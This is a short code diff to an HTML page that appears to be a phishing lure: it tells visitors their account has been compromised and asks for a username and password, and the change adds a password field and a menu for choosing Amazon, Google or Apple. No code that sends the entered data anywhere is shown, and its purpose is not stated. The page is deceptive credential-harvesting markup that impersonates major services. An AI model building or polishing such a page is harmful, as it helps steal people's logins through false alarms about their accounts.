--- a/index.html
+++ b/index.html
@@ -16,7 +16,8 @@
       <h3>Your account has been compromised! Please enter credentials to secure your account!</h3>
         <form id="form">
             <input type="text" id="username" placeholder="Username" />
-            <input type="text" id="password" placeholder
+            <input type="text" id="password" placeholder="Password" />
+            <select id="service" name="Choose Service.">
               <option value="amazon">Amazon</option>
               <option value="google">Google</option>
               <option value="apple">Apple</option>
